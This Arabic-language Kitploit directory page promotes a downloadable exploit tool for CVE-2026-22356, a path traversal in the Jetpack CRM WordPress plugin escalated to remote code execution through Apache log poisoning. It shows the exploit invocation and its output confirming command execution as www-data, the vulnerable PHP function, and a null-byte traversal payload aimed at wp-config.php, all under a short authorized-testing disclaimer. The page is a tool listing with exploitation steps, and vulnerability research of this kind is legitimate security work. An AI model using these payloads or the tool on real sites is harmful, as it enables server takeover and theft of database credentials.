Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22356 — CVE-2026-22356: ثغرة اجتياز المسار في Jetpack CRM وRCE | Kitploit
أدوات/GitHubGitHub/xxconi/cve-2026-22356
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubxxconi/cve-2026-22356

CVE-2026-22356

CVE-2026-22356: ثغرة اجتياز المسار في Jetpack CRM وRCE

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-22356: ثغرة اجتياز المسار في Jetpack CRM وتنفيذ الأوامر عن بُعد

تحذير: يجب استخدام هذه الأداة فقط في بيئات الاختبار المصرح بها. المستخدم مسؤول تمامًا عن أي استخدام غير قانوني.

📥 المتطلبات

root@kitploit:~
pip3 install requests urllib3

$ python3 exploit.py https://example.com --rce --cmd "id"
[+] Target is VULNERABLE to LFI!
[*] Attempting Log Poisoning for RCE...
[*] Searching for accessible log files...
[*] Trying: ../../../../var/log/apache2/access.log
[+] Found accessible log file: ../../../../var/log/apache2/access.log
[*] Poisoning log file: ../../../../var/log/apache2/access.log
[+] Payload injected into log file.
[*] Executing command: id

[+] Command Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

function jpcrm_load_admin_page( $page_name, $alt_path = ZEROBSCRM_PATH ) {
    $target_file = $alt_path . "admin/$page_name.page.php";
    if ( file_exists( $target_file ) ) {
        require_once $target_file;
    }
}

في هذا الكود، يُستخدم $page_name مباشرة دون أي تحقق، لذا يمكن للمهاجم إرسال page=../../../wp-config.php%00 لإطلاق استدعاء require_once("admin/../../../wp-config.php%00.page.php"). عندما يفسر PHP البايت الفارغ (null byte) على أنه نهاية اسم الملف، يتم تنفيذ ملف wp-config.php.

في الإصدار 6.7.1، تم إصلاح هذا الكود بإضافة فحوصات realpath() و strpos().

أُعدّ هذا المستند لمساعدتك على فهم ثغرة CVE-2026-22356 واستخدامها في اختباراتك المصرح بها. الاستخدام المخالف للقانون يقع بالكامل على مسؤولية المستخدم.

تنزيل الأداة